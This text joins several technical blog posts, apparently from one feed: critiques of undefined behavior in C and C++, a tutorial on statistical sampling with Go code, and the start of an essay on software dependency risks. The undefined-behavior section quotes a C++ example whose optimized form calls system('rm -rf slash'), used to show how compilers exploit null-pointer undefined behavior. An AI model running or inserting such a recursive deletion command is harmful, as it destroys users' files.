Ones’ complement
<li>
Two’s complement</ul>
<p>
See §4 C Signed Integer Wording for full wording.
<p>
C++ inherits these three signed integer representations from C. To the author’s knowledge no modern machine uses both C++ and a signed integer representation other than two’s complement (see §5 Survey of Signed Integer Representations). None of [MSVC], [GCC], and [LLVM] support other representations. This means that the C++ that is taught is effectively two’s complement, and the C++ that is written is two’s complement. It is extremely unlikely that there exist any significant code base developed for two’s complement machines that would actually work when run on a non-two’s complement machine.
<p>
The C++ that is spec’d, however, is not two’s complement. Signed integers currently allow for trap representations, extra padding bits, integral negative zero, and introduce undefined behavior and implementation-defined behavior for the sake of this extremely abstract machine.
<p>
Specifically, the current wording has the following effects:
<ul>
<li>
Associativity and commutativity of integers is needlessly obtuse.
<li>
Naïve overflow checks, which are often security-critical, often get eliminated by compilers. This leads to exploitable code when the intent was clearly not to and the code, while naïve, was correctly performing security checks for two’s complement integers. Correct overflow checks are difficult to write and equally difficult to read, exponentially so in generic code.
<li>
Conversion between signed and unsigned are implementation-defined.
<li>
There is no portable way to generate an arithmetic right-shift, or to sign-extend an integer, which every modern CPU supports.
<li>
constexpr is further restrained by this extraneous undefined behavior.
<li>
Atomic integral are already two’s complement and have no undefined results, therefore even freestanding implementations already support two’s complement in C++.</ul>
<p>
Let’s stop pretending that the C++ abstract machine should represent integers as signed magnitude or ones’ complement. These theoretical implementations are a different programming language, not our real-world C++. Users of C++ who require signed magnitude or ones’ complement integers would be better served by a pure-library solution, and so would the rest of us.</blockquote>
<p>
In the end, the C++ standards committee put up “strong resistance against” the idea of defining
signed integer overflow the way every programmer expects; the undefined behavior remains.
<a class=anchor href="#loops"><h2 id="loops">Infinite loops</h2></a>
<p>
A programmer would never accidentally cause a program to execute an infinite loop, would they?
Consider this program:
<pre>#include <stdio.h>

int stop = 1;

void maybeStop() {
	if(stop)
		for(;;);
}

int main() {
	printf("hello, ");
	maybeStop();
	printf("world\n");
}
</pre>
<p>
This seems like a completely reasonable program to write. Perhaps you are debugging and want the program to stop so you can attach a debugger. Changing the initializer for <code>stop</code> to <code>0</code> lets the program run to completion.
But it turns out that, at least with the latest Clang, the program runs to completion anyway:
the call to <code>maybeStop</code> is optimized away entirely, even when <code>stop</code> is <code>1</code>.
<p>
The problem is that C++ defines that the compiler may assume every side-effect-free loop terminates.
That is, a side-effect-free loop that does not terminate has undefined behavior.
This is purely for the sake of compiler optimizations, which are once again treated as more important than correctness.
The rationale for this decision played out in the C standards process and was more or less adopted in the C++ standard as well.
<p>
John Regehr pointed out this problem in his post
“<a href="https://blog.regehr.org/archives/140">C Compilers Disprove Fermat’s Last Theorem</a>,”
which included this entry in a FAQ:<blockquote>
<p>
Q: Does the C standard permit/forbid the compiler to terminate infinite loops?
<p>
A: The compiler is given considerable freedom in how it implements the C program,
but its output must have the same externally visible behavior that the program would have when interpreted by the “C abstract machine” that is described in the standard. Many knowledgeable people (including me) read this as saying that the termination behavior of a program must not be changed. Obviously some compiler writers disagree, or else don’t believe that it matters. The fact that reasonable people disagree on the interpretation would seem to indicate that the C standard is flawed.</blockquote>
<p>
A few months later, Douglas Walls wrote <a href="http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1509.pdf">WG14/N1509: Optimizing away infinite loops</a>,
making the case that the standard should <i>not</i> allow this optimization.
In response, Hans-J. Boehm wrote
<a href="http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1528.htm">WG14/N1528: Why undefined behavior for infinite loops?</a>,
arguing for allowing the optimization.
<p>
Consider the potential optimization of this code:
<pre>for (p = q; p != 0; p = p->next)
	++count;
for (p = q; p != 0; p = p->next)
	++count2;
</pre>
<p>
A sufficiently smart compiler might reduce it to this code:
<pre>for (p = q; p != 0; p = p->next) {
	++count;
	++count2;
}
</pre>
<p>
Is that safe? Not if the first loop is an infinite loop. If the list at <code>p</code> is cyclic and another thread is modifying <code>count2</code>,
then the first program never touches <code>count2</code> and has no race, while the second program updates <code>count2</code> concurrently with the other thread and does have a race.
Compilers clearly can’t turn correct, race-free programs into racy programs.
But what if we declare that infinite loops are not correct programs?
That is, what if infinite loops were undefined behavior?
Then the compiler could optimize to its robotic heart’s content.
This is exactly what the C standards committee decided to do.
<p>
The rationale, paraphrased, was:
<ul>
<li>
It is very difficult to tell if a given loop is infinite.
<li>
Infinite loops are rare and typically unintentional.
<li>
There are many loop optimizations that are only valid for non-infinite loops.
<li>
The performance wins of these optimizations are deemed important.
<li>
Some compilers already apply these optimizations, making infinite loops non-portable too.
<li>
Therefore, we should declare programs with infinite loops undefined behavior, enabling the optimizations.</ul>
<a class=anchor href="#null"><h2 id="null">Null pointer usage</h2></a>
<p>
We’ve all seen how dereferencing a null pointer causes a crash on modern operating systems:
they leave page zero unmapped by default precisely for this purpose.
But not all systems where C and C++ run have hardware memory protection.
For example, I wrote my first C and C++ programs using Turbo C on an MS-DOS system.
Reading or writing a null pointer did not cause any kind of fault:
the program just touched the memory at location zero and kept running.
The correctness of my code improved dramatically when I moved to
a Unix system that made those programs crash at the moment of the mistake.
Because the behavior is non-portable, though, dereferencing a null pointer is undefined behavior.
<p>
At some point, the justification for keeping the undefined behavior became performance.
<a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">Chris Lattner explains</a>:<blockquote>
<p>
In C-based languages, NULL being undefined enables a large number of simple scalar optimizations that are exposed as a result of macro expansion and inlining.</blockquote>
<p>
In <a href="plmm#ub">an earlier post</a>, I showed this example, lifted from <a href="https://twitter.com/andywingo/status/903577501745770496">Twitter in 2017</a>:
<pre>#include <cstdlib>

typedef int (*Function)();
static Function Do;

static int EraseAll() {
	return system("rm -rf slash");
}

void NeverCalled() {
	Do = EraseAll;
}

int main() {
	return Do();
}
</pre>
<p>
Because calling <code>Do()</code> is undefined behavior when <code>Do</code> is null, a modern C++ compiler like Clang
simply assumes that can’t possibly be what’s happening in <code>main</code>.
Since <code>Do</code> must be either null or <code>EraseAll</code>, and since calling a null <code>Do</code> is undefined behavior,
we might as well assume <code>Do</code> is <code>EraseAll</code> unconditionally,
even though <code>NeverCalled</code> is never called.
So this program can be (and is) optimized to:
<pre>int main() {
	return system("rm -rf slash");
}
</pre>
<p>
Lattner gives <a href="https://blog.llvm.org/2011/05/what-every-c-programmer-should-know_14.html">an equivalent example</a> (search for <code>FP()</code>)
and then this advice:<blockquote>
<p>
The upshot is that it is a fixable issue: if you suspect something weird is going on like this, try building at -O0, where the compiler is much less likely to be doing any optimizations at all.</blockquote>
<p>
This advice is not uncommon: if you cannot debug the correctness problems in your C++ program, disable optimizations.
<a class=anchor href="#sort"><h2 id="sort">Crashes out of sorts</h2></a>
<p>
C++’s <code>std::sort</code> sorts a collection of values
(abstracted as a random access iterator, but almost always an array)
according to a user-specified comparison function.
The default function is <code>operator<</code>, but you can write any function.
For example, if you were sorting instances of class <code>Person</code>, your
comparison function might sort by the <code>LastName</code> field, breaking
ties with the <code>FirstName</code> field.
These comparison functions end up being subtle yet boring to write,
and it’s easy to make a mistake.
If you do make a mistake and pass in a comparison function that
returns inconsistent results or accidentally reports that any value
is less than itself, that’s undefined behavior:
<code>std::sort</code> is now allowed to do whatever it likes,
including walking off either end of the array
and corrupting other memory.
If you’re lucky, it will pass some of this memory to your comparison
function, and since it won’t have pointers in the right places,
your comparison function will crash.
Then at least you have a chance of guessing the comparison function is at fault.
In the worst case, memory is silently corrupted and the crash happens much later,
with <code>std::sort</code> nowhere to be found.
<p>
Programmers make mistakes, and when they do, <code>std::sort</code> corrupts memory.
This is not hypothetical. It happens enough in practice to be a
<a href="https://stackoverflow.com/questions/18291620/why-will-stdsort-crash-if-the-comparison-function-is-not-as-operator">popular question on StackOverflow</a>.
<p>
As a final note, it turns out that <code>operator<</code> is not a valid comparison function
on floating-point numbers if NaNs are involved, because:
<ul>
<li>
1 < NaN and NaN < 1 are both false, implying NaN == 1.
<li>
2 < NaN and NaN < 2 are both false, implying NaN == 2.
<li>
Since NaN == 1 and NaN == 2, 1 == 2, yet 1 < 2 is true.</ul>
<p>
Programming with NaNs is never pleasant, but it seems particularly extreme
to allow <code>std::sort</code> to crash when handed one.
<a class=anchor href="#reveal"><h2 id="reveal">Reflections and revealed preferences</h2></a>
<p>
Looking over these examples,
it could not be more obvious that in modern C and C++,
performance is job one and correctness is job two.
To a C/C++ compiler, a programmer making a mistake and (gasp!)
compiling a program containing a bug is just not a concern.
Rather than have the compiler point out the bug or at least
compile the code in a clear, understandable, debuggable manner,
the approach over and over again is
to let the compiler do whatever it likes,
in the name of performance.
<p>
This may not be the wrong decision for these languages.
There are undeniably power users for whom every last bit of performance
translates to very large sums of money, and I don’t claim
to know how to satisfy them otherwise.
On the other hand, this performance comes at a significant
development cost, and there are probably plenty of people and companies
who spend more than their performance savings
on unnecessarily difficult debugging sessions
and additional testing and sanitizing.
It also seems like there must be a middle ground where
programmers retain most of the control they have in C and C++
but the program doesn’t crash when sorting NaNs or
behave arbitrarily badly if you accidentally dereference a null pointer.
Whatever the merits, it is important to see clearly the choice that C and C++ are making.
<p>
In the case of arithmetic overflow, later drafts of the
proposal removed the defined behavior for wrapping, explaining:<blockquote>
<p>
The main change between [P0907r0] and the subsequent revision is to maintain undefined behavior when signed integer overflow occurs, instead of defining wrapping behavior. This direction was motivated by:
<ul>
<li>
Performance concerns, whereby defining the behavior prevents optimizers from assuming that overflow never occurs;
<li>
Implementation leeway for tools such as sanitizers;
<li>
Data from Google suggesting that over 90% of all overflow is a bug, and defining wrapping behavior would not have solved the bug.</ul>
</blockquote>
<p>
Again, performance concerns rank first.
I find the third item in the list particularly telling.
I’ve known C/C++ compiler authors who got excited about a 0.1% performance improvement,
and incredibly excited about 1%.
Yet here we have an idea that would change 10% of affected programs from incorrect to correct,
and it is rejected, because performance is more important.
<p>
The argument about sanitizers is more nuanced.
Leaving a behavior undefined allows any implementation at all, including reporting the
behavior at runtime and stopping the program.
True, the widespread use of undefined behavior enables sanitizers like ThreadSanitizer, MemorySanitizer, and UBSan,
but so would defining the behavior as “either this specific behavior, or a sanitizer report.”
If you believed correctness was job one, you could
define overflow to wrap, fixing the 10% of programs outright
and making the 90% behave at least more predictably,
and then at the same time define that overflow is still
a bug that can be reported by sanitizers.
You might object that requiring wrapping in the absence of a sanitizer
would hurt performance, and that’s fine: it’s just more evidence that
performance trumps correctness.
<p>
One thing I find surprising, though, is that correctness gets ignored even
when it clearly doesn’t hurt performance.
It would certainly not hurt performance to emit a compiler warning
about deleting the <code>if</code> statement testing for signed overflow,
or about optimizing away the possible null pointer dereference in <code>Do()</code>.
Yet I could find no way to make compilers report either one; certainly not <code>-Wall</code>.
<p>
The explanatory shift from non-portable to optimizable also seems revealing.
As far as I can tell, C89 did not use performance as a justification for any of
its undefined behaviors.
They were non-portabilities, like signed overflow and null pointer dereferences,
or they were outright bugs, like use-after-free.
But now experts like Chris Lattner and Hans Boehm point to optimization potential,
not portability, as justification for undefined behaviors.
I conclude that the rationales really have shifted from the mid-1980s to today:
an idea that was meant to capture non-portability has been preserved for the sake of performance,
trumping concerns like correctness and debuggability.
<p>
Occasionally in Go we have <a href="https://go.dev/blog/compat#input">changed library functions to remove surprising behavior</a>.
It’s always a difficult decision, but we are willing
to break existing programs depending on a mistake
if correcting the mistake fixes a much larger number of programs.
I find it striking that the C and C++ standards committees are
willing in some cases to break existing programs if doing so
merely <i>speeds up</i> a large number of programs.
This is exactly what happened with the infinite loops.
<p>
I find the infinite loop example telling for a second reason:
it shows clearly the escalation from non-portable to optimizable.
In fact, it would appear that if you want to break C++ programs in
service of optimization, one possible approach is to just do that in a
compiler and wait for the standards committee to notice.
The de facto non-portability of whatever programs you have broken
can then serve as justification for undefining their behavior,
leading to a future version of the standard in which your optimization is legal.
In the process, programmers have been handed yet another footgun
to try to avoid setting off.
<p>
(A common counterargument is that the standards committee cannot
force existing implementations to change their compilers.
This doesn’t hold up to scrutiny: every new feature that gets added
is the standards committee forcing existing implementations
to change their compilers.)
<p>
I am not claiming that anything should change about C and C++.
I just want people to recognize that the current versions of these languages
sacrifice correctness for performance.
To some extent, all languages do this: there is almost always a tradeoff
between performance and slower, safer implementations.
Go has data races in part for performance reasons:
we could have done everything by message copying
or with a single global lock instead, but the performance wins of
shared memory were too large to pass up.
For C and C++, though, it seems no performance win is too small
to trade against correctness.
<p>
As a programmer, you have a tradeoff to make too,
and the language standards make it clear which side they are on.
In some contexts, performance is the dominant priority and
nothing else matters quite as much.
If so, C or C++ may be the right tool for you.
But in most contexts, the balance flips the other way.
If programmer productivity, debuggability, reproducible bugs,
and overall correctness and understandability
are more important than squeezing every last little bit of performance,
then C and C++ are not the right tools for you.
I say this with some regret, as I spent many years happily writing C programs.
<p>
I have tried to avoid exaggerated, hyperbolic language in this post,
instead laying out the tradeoff and the preferences revealed
by the decisions being made.
John Regehr wrote a less restrained series of posts about undefined behavior
a decade ago, and in <a href="https://blog.regehr.org/archives/226">one of them</a> he concluded:<blockquote>
<p>
It is basically evil to make certain program actions wrong, but to not give developers any way to tell whether or not their code performs these actions and, if so, where. One of C’s design points was “trust the programmer.” This is fine, but there’s trust and then there’s trust. I mean, I trust my 5 year old but I still don’t let him cross a busy street by himself. Creating a large piece of safety-critical or security-critical code in C or C++ is the programming equivalent of crossing an 8-lane freeway blindfolded.</blockquote>
<p>
To be fair to C and C++,
if you set yourself the goal of crossing an 8-lane freeway blindfolded,
it does make sense to focus on doing it as fast as you possibly can.
The Magic of Sampling, and its Limitationstag:research.swtch.com,2012:research.swtch.com/sample2023-02-04T12:00:00-05:002023-02-04T12:02:00-05:00The magic of using small samples to learn about large data sets.
<p>
Suppose I have a large number of M&Ms
and want to estimate what fraction of them have <a href="https://spinroot.com/pjw">Peter’s face</a> on them.
As one does.
<p>
<img name="sample-pjw1" class="center pad resizable" width=450 height=276 src="sample-pjw1.jpg" srcset="sample-pjw1.jpg 1x, sample-pjw1@2x.jpg 2x, sample-pjw1@4x.jpg 4x">
<p>
If I am too lazy to count them all, I can estimate the true fraction using sampling:
pick N at random, count the number P of them that have Peter’s face, and then estimate
the fraction to be P/N.
<p>
I can <a href="https://go.dev/play/p/GQr6ShQ_ivG">write a Go program</a> to pick 10 of the 37 M&Ms for me: 27 30 1 13 36 5 33 7 10 19.
(Yes, I am too lazy to count them, but I was not too lazy to number the M&Ms in order to use the Go program.)
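<p>
(The playground program is linked rather than shown; a minimal picker along these lines would do the job.)
<pre>package main

import (
	"fmt"
	"math/rand"
)

func main() {
	// Pick 10 of the 37 M&Ms (numbered 1 through 37) at random,
	// without replacement.
	for _, i := range rand.Perm(37)[:10] {
		fmt.Printf("%d ", i+1)
	}
	fmt.Println()
}
</pre>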
<p>
<img name="sample-pjw2" class="center pad resizable" width=450 height=73 src="sample-pjw2.jpg" srcset="sample-pjw2.jpg 1x, sample-pjw2@2x.jpg 2x, sample-pjw2@4x.jpg 4x">
<p>
Based on this sample, we can estimate that 3/10 = 30% of my M&Ms have Peter’s face.
We can do it a few more times:
<p>
<img name="sample-pjw3" class="center pad resizable" width=450 height=64 src="sample-pjw3.jpg" srcset="sample-pjw3.jpg 1x, sample-pjw3@2x.jpg 2x, sample-pjw3@4x.jpg 4x">
<p>
<img name="sample-pjw4" class="center pad resizable" width=450 height=61 src="sample-pjw4.jpg" srcset="sample-pjw4.jpg 1x, sample-pjw4@2x.jpg 2x, sample-pjw4@4x.jpg 4x">
<p>
<img name="sample-pjw5" class="center pad resizable" width=450 height=73 src="sample-pjw5.jpg" srcset="sample-pjw5.jpg 1x, sample-pjw5@2x.jpg 2x, sample-pjw5@4x.jpg 4x">
<p>
And we get a few new estimates: 30%, 40%, 20%. The actual fraction turns out to be 9/37 = 24.3%.
These estimates are perhaps not that impressive,
but we are only using 10 samples.
With not too many more samples, we can get far more accurate estimates,
even for much larger data sets.
Suppose we had many more M&Ms, again 24.3% Peter faces, and we sample 100 of them, or 1,000, or 10,000.
Since we’re lazy, let’s write <a href="https://go.dev/play/p/VcqirSSiS1Q">a program to simulate the process</a>.
<pre>$ go run sample.go
10: 40.0% 20.0% 30.0% 0.0% 10.0% 30.0% 10.0% 20.0% 20.0% 0.0%
100: 25.0% 26.0% 21.0% 26.0% 15.0% 25.0% 30.0% 30.0% 29.0% 20.0%
1000: 24.7% 23.8% 21.0% 25.4% 25.1% 24.2% 25.7% 22.9% 24.0% 23.8%
10000: 23.4% 24.6% 24.3% 24.3% 24.7% 24.6% 24.6% 24.7% 24.1% 25.0%
$
</pre>
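<p>
The simulation program is also linked rather than shown; a minimal version along
these lines, with the 24.3% fraction hard-coded, produces output of the same shape:
<pre>package main

import (
	"fmt"
	"math/rand"
)

// estimate draws n random samples from a population in which frac of the
// items have the property and returns the estimated fraction.
func estimate(frac float64, n int) float64 {
	count := 0
	for i := 0; i < n; i++ {
		if rand.Float64() < frac {
			count++
		}
	}
	return float64(count) / float64(n)
}

func main() {
	const frac = 9.0 / 37 // 24.3% Peter faces
	for _, n := range []int{10, 100, 1000, 10000} {
		fmt.Printf("%5d:", n)
		for i := 0; i < 10; i++ {
			fmt.Printf(" %.1f%%", 100*estimate(frac, n))
		}
		fmt.Println()
	}
}
</pre>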
<p>
Accuracy improves fairly quickly:
<ul>
<li>
With 10 samples, our estimates are accurate to within about 15%.
<li>
With 100 samples, our estimates are accurate to within about 5%.
<li>
With 1,000 samples, our estimates are accurate to within about 3%.
<li>
With 10,000 samples, our estimates are accurate to within about 1%.</ul>
<p>
Because we are estimating only the percentage of Peter faces,
not the total number, the accuracy (also measured in percentages)
does not depend on the total number of M&Ms, only on the number of samples.
So 10,000 samples is enough to get roughly 1% accuracy whether we have
100,000 M&Ms, 1 million M&Ms, or even 100 billion M&Ms!
In the last scenario, we have 1% accuracy despite only sampling 0.00001% of the M&Ms.
<p>
<b>The magic of sampling is that we can derive accurate estimates
about a very large population using a relatively small number of samples.</b>
<p>
Sampling turns many one-off estimations into jobs that are feasible to do by hand.
For example, suppose we are considering revising an error-prone API
and want to estimate how often that API is used incorrectly.
If we have a way to randomly sample uses of the API
(maybe <code>grep -Rn pkg.Func . | shuffle -m 100</code>),
then manually checking 100 of them will give us an estimate
that’s accurate to within 5% or so.
And checking 1,000 of them, which may not take more than an hour or so
if they’re easy to eyeball, improves the accuracy to 1.5% or so.
Real data to decide an important question
is usually well worth a small amount of manual effort.
<p>
For the kinds of decisions I look at related to Go,
this approach comes up all the time:
What fraction of <code>for</code> loops in real code have a <a href="https://github.com/golang/go/discussions/56010">loop scoping bug</a>?
What fraction of warnings by a new <code>go</code> <code>vet</code> check are false positives?
What fraction of modules have no dependencies?
These are drawn from my experience, and so they may seem specific to Go
or to language development, but once you realize that
sampling makes accurate estimates so easy to come by,
all kinds of uses present themselves.
Any time you have a large data set,
<pre>select * from data order by random() limit 1000;
</pre>
<p>
is a very effective way to get a data set you can analyze by hand
and still derive many useful conclusions from.
<a class=anchor href="#accuracy"><h2 id="accuracy">Accuracy</h2></a>
<p>
Let’s work out what accuracy we should expect from these estimates.
The brute force approach would be to run many samples of a given size
and calculate the accuracy for each.
<a href="https://go.dev/play/p/NWUOanCpFtl">This program</a> runs 1,000 trials of 100 samples each,
calculating the observed error for each estimate
and then printing them all in sorted order.
If we plot those points one after the other along the x axis,
we get a picture like this:
<p>
<img name="sample1" class="center pad" width=370 height=369 src="sample1.png" srcset="sample1.png 1x, sample1@2x.png 2x">
<p>
The <a href="https://9fans.github.io/plan9port/man/man1/gview.html">data viewer I’m using in this screenshot</a> has scaled the x-axis labels by
a factor of 1,000 (“x in thousands”).
Eyeballing the scatterplot, we can see that half the time the error
is under 3%, and 80% of the time the error is under 5½%.
<p>
We might wonder at this point whether the error
depends on the actual answer (24.3% in our programs so far).
It does: the error will be lower when the population is lopsided.
Obviously, if the M&Ms are 0% or 100% Peter faces,
our estimates will have no error at all.
In a slightly less degenerate case,
if the M&Ms are 1% or 99% Peter faces, the most likely estimate
from just a few samples is 0% or 100%, which has only 1% error.
It turns out that, in general, the error is maximized when
the actual fraction is 50%,
so <a href="https://go.dev/play/p/Vm2s1SwlKKT">we’ll use that</a> for the rest of the analysis.
<p>
With an actual fraction of 50%, 1,000 sorted errors
from estimating by sampling 100 values look like:
<p>
<img name="sample2" class="center pad" width=369 height=369 src="sample2.png" srcset="sample2.png 1x, sample2@2x.png 2x">
<p>
The errors are a bit larger.
Now half the time the error is under 4%, and 80% of the time the error is under 6%.
Zooming in on the tail end of the plot produces:
<p>
<img name="sample3" class="center pad" width=390 height=368 src="sample3.png" srcset="sample3.png 1x, sample3@2x.png 2x">
<p>
We can see that 90% of the trials have error 8% or less,
95% of the trials have error 10% or less,
and 99% of the trials have error 12% or less.
The statistical way to phrase those statements
is that “a sample of size N = 100
produces a margin of error of 8% with 90% confidence,
10% with 95% confidence,
and 12% with 99% confidence.”
<p>
Instead of eyeballing the graphs, we can <a href="https://go.dev/play/p/Xq7WMyrNWxq">update the program</a>
to compute these numbers directly.
<pre>$ go run sample.go
N = 10: 90%: 30.00% 95%: 30.00% 99%: 40.00%
N = 100: 90%: 9.00% 95%: 11.00% 99%: 13.00%
N = 1000: 90%: 2.70% 95%: 3.20% 99%: 4.30%
N = 10000: 90%: 0.82% 95%: 0.98% 99%: 1.24%
$
</pre>
<p>
There is something meta about using sampling (of trials) to estimate the errors introduced
by sampling of an actual distribution.
What about the error being introduced by sampling the errors?
We could instead write a program to count all possible outcomes
and calculate the exact error distribution,
but counting won’t work for larger sample sizes.
Luckily, others have done the math for us
and even implemented the relevant functions
in Go’s standard <a href="https://pkg.go.dev/math">math package</a>.
The margin of error for a given confidence level
and sample size is:
<pre>func moe(confidence float64, N int) float64 {
	return math.Erfinv(confidence) / math.Sqrt(2*float64(N))
}
</pre>
<p>
That lets us compute the table <a href="https://go.dev/play/p/DKeNfDwLmJZ">more directly</a>.
<pre>$ go run sample.go
N = 10: 90%: 26.01% 95%: 30.99% 99%: 40.73%
N = 20: 90%: 18.39% 95%: 21.91% 99%: 28.80%
N = 50: 90%: 11.63% 95%: 13.86% 99%: 18.21%
N = 100: 90%: 8.22% 95%: 9.80% 99%: 12.88%
N = 200: 90%: 5.82% 95%: 6.93% 99%: 9.11%
N = 500: 90%: 3.68% 95%: 4.38% 99%: 5.76%
N = 1000: 90%: 2.60% 95%: 3.10% 99%: 4.07%
N = 2000: 90%: 1.84% 95%: 2.19% 99%: 2.88%
N = 5000: 90%: 1.16% 95%: 1.39% 99%: 1.82%
N = 10000: 90%: 0.82% 95%: 0.98% 99%: 1.29%
N = 20000: 90%: 0.58% 95%: 0.69% 99%: 0.91%
N = 50000: 90%: 0.37% 95%: 0.44% 99%: 0.58%
N = 100000: 90%: 0.26% 95%: 0.31% 99%: 0.41%
$
</pre>
<p>
We can also reverse the equation to compute the necessary
sample size from a given confidence level and margin of error:
<pre>func N(confidence, moe float64) int {
	return int(math.Ceil(0.5 * math.Pow(math.Erfinv(confidence)/moe, 2)))
}
</pre>
<p>
That lets us <a href="https://go.dev/play/p/Y81_FORHvw5">compute this table</a>.
<pre>$ go run sample.go
moe = 5%: 90%: 271 95%: 385 99%: 664
moe = 2%: 90%: 1691 95%: 2401 99%: 4147
moe = 1%: 90%: 6764 95%: 9604 99%: 16588
$
</pre>
<a class=anchor href="#limitations"><h2 id="limitations">Limitations</h2></a>
<p>
To accurately estimate the fraction of items with
a given property, like M&Ms with Peter faces,
each item must have the same chance of being selected,
as each M&M did.
Suppose instead that we had ten bags of M&Ms:
nine one-pound bags with 500 M&Ms each,
and a small bag containing the 37 M&Ms we used before.
If we want to estimate the fraction of M&Ms with
Peter faces, it would not work to sample by
first picking a bag at random
and then picking an M&M at random from the bag.
The chance of picking any specific M&M from a one-pound bag
would be 1/10 × 1/500 = 1/5,000, while the chance
of picking any specific M&M from the small bag would be
1/10 × 1/37 = 1/370.
We would end up with an estimate of around 9/370 = 2.4% Peter faces,
even though the actual answer is 9/(9×500+37) = 0.2% Peter faces.
<p>
The problem here is not the kind of random sampling error
that we computed in the previous section.
Instead it is a systematic error caused by a sampling mechanism
that does not align with the statistic being estimated.
We could recover an accurate estimate by weighting
an M&M found in the small bag as only w = 37/500 of an M&M
in both the numerator and denominator of any estimate.
For example, if we picked 100 M&Ms with replacement from each bag
and found 24 Peter faces in the small bag,
then instead of 24/1000 = 2.4% we would compute 24w/(900+100w) = 0.2%.
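<p>
A few lines of code, using the same sample counts, confirm the arithmetic:
<pre>package main

import "fmt"

func main() {
	// Each sample from the small bag counts as only 37/500 of an M&M,
	// because the small bag holds 37 M&Ms but is picked as often as
	// each 500-M&M bag.
	w := 37.0 / 500

	// 100 samples with replacement from each of the ten bags,
	// 24 Peter faces found, all of them in the small bag.
	fmt.Printf("naive:    %.1f%%\n", 100*24.0/1000)        // 2.4%
	fmt.Printf("weighted: %.1f%%\n", 100*24*w/(900+100*w)) // 0.2%
	fmt.Printf("actual:   %.1f%%\n", 100*9.0/(9*500+37))   // 0.2%
}
</pre>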
<p>
As a less contrived example,
<a href="https://go.dev/blog/pprof">Go’s memory profiler</a>
aims to sample approximately one allocation per half-megabyte allocated
and then derive statistics about where programs allocate memory.
Roughly speaking, to do this the profiler maintains a sampling trigger,
initialized to a random number between 0 and one million.
Each time a new object is allocated,
the profiler decrements the trigger by the size of the object.
When an allocation decrements the trigger below zero,
the profiler samples that allocation
and then resets the trigger to a new random number
between 0 and one million.
<p>
This byte-based sampling means that to estimate the
fraction of bytes allocated in a given function,
the profiler can divide the total sampled bytes allocated in that function
by the total sampled bytes allocated in the entire program.
Using the same approach to
estimate the fraction of <i>objects</i> allocated in a given function
would be inaccurate: it would overcount large objects and undercount
small ones, because large objects are more likely to be sampled.
In order to recover accurate statistics about allocation counts,
the profiler applies a size-based weighting function
during the calculation, just as in the M&M example.
(This is the reverse of the situation with the M&Ms:
we are randomly sampling individual bytes of allocated memory
but now want statistics about their “bags”.)
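<p>
A sketch of the byte-based sampling and the size-based reweighting, not the
runtime’s actual code, and assuming every allocation is smaller than the
sampling period, looks like this:
<pre>package main

import (
	"fmt"
	"math/rand"
)

const period = 1000000 // trigger reset range: 0 to one million bytes

type sampler struct {
	trigger int64   // bytes remaining until the next sample
	sizes   []int64 // sizes of sampled allocations
}

// alloc records an allocation of the given size, sampling it
// if it decrements the trigger below zero.
func (s *sampler) alloc(size int64) {
	s.trigger -= size
	if s.trigger < 0 {
		s.sizes = append(s.sizes, size)
		s.trigger = rand.Int63n(period)
	}
}

func main() {
	s := &sampler{trigger: rand.Int63n(period)}

	// A made-up workload: a million 16-byte objects and eighty 256 KB objects.
	for i := 0; i < 1000000; i++ {
		s.alloc(16)
	}
	for i := 0; i < 80; i++ {
		s.alloc(256 << 10)
	}

	// Each sample stands for roughly one sampling period's worth of allocated
	// bytes, so the byte fraction reduces to the fraction of samples;
	// to estimate object counts instead, weight each sample by 1/size.
	var largeSamples, totalSamples, largeObjs, totalObjs float64
	for _, sz := range s.sizes {
		totalSamples++
		totalObjs += 1 / float64(sz)
		if sz >= 256<<10 {
			largeSamples++
			largeObjs += 1 / float64(sz)
		}
	}
	fmt.Printf("estimated byte fraction in large objects:   %.0f%% (actual 57%%)\n", 100*largeSamples/totalSamples)
	fmt.Printf("estimated object fraction in large objects: %.3f%% (actual 0.008%%)\n", 100*largeObjs/totalObjs)
}
</pre>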
<p>
It is not always possible to undo skewed sampling,
and the skew makes margin of error calculation
more difficult too.
It is almost always better to make sure that the
sampling is aligned with the statistic you want to compute.
Our Software Dependency Problemtag:research.swtch.com,2012:research.swtch.com/deps2019-01-23T11:00:00-05:002019-01-23T11:02:00-05:00Download and run code from strangers on the internet. What could go wrong?
<p>
For decades, discussion of software reuse was far more common than actual software reuse.
Today, the situation is reversed: developers reuse software written by others every day,
in the form of software dependencies,
and the situation goes mostly unexamined.
<p>
My own background includes a decade of working with
Google’s internal source code system,
which treats software dependencies as a first-class concept,<sup class=footnote><a class=footnote id=fnref-1 href='#fn-1'>1</a></sup>
and also developing support for
dependencies in the Go programming language.<sup class=footnote><a class=footnote id=fnref-2 href='#fn-2'>2</a></sup>
<p>
Software dependencies carry with them
serious risks that are too often overlooked.
The shift to easy, fine-grained software reuse has happened so quickly
that we do not yet understand the best practices for choosing
and using dependencies effectively,
or even for deciding when they are appropriate and when not.
My purpose in writing this article is to raise awareness of the risks
and encourage more investigation of solutions.
<a class=anchor href="#what_is_a_dependency"><h2 id="what_is_a_dependency">What is a dependency?</h2></a>
<p>
In today’s software development world,
a <i>dependency</i> is additional code that you want to call from your program.
Adding a dependency avoids repeating work already done:
designing, writing, testing, debugging, and maintaining a specific
unit of code.
In this article we’ll call that unit of code a <i>package</i>;
some systems use terms like library or module instead of package.
<p>
Taking on externally-written dependencies is an old practice:
most programmers have at one point in their careers
had to go through the steps of manually downloading and installing
a required library, like C’s PCRE or zlib, or C++’s Boost or Qt,
or Java’s JodaTime or JUnit.
These packages contain high-quality, debugged code
that required significant expertise to develop.
For a program that needs the functionality provided by one of these packages,
the tedious work of manually downloading, installing, and updating
the package
is easier than the work of redeveloping that functionality from scratch.
But the high fixed costs of reuse
mean that manually-reused packages tend to be big:
a tiny package would be easier to reimplement.
<p>
A <i>dependency manager</i>
(sometimes called a package manager)
automates the downloading and installation of dependency packages.
As dependency managers
make individual packages easier to download and install,
the lower fixed costs make
smaller packages economical to publish and reuse.
<p>
For example, the Node.js dependency manager NPM provides
access to over 750,000 packages.
One of them, <code>escape-string-regexp</code>,
provides a single function that escapes regular expression
operators in its input.
The entire implementation is:
<pre>var matchOperatorsRe = /[|\\{}()[\]^$+*?.]/g;

module.exports = function (str) {
	if (typeof str !== 'string') {
		throw new TypeError('Expected a string');
	}
	return str.replace(matchOperatorsRe, '\\$&');
};
</pre>
<p>
Before dependency managers, publishing an eight-line code library
would have been unthinkable: too much overhead for too little benefit.
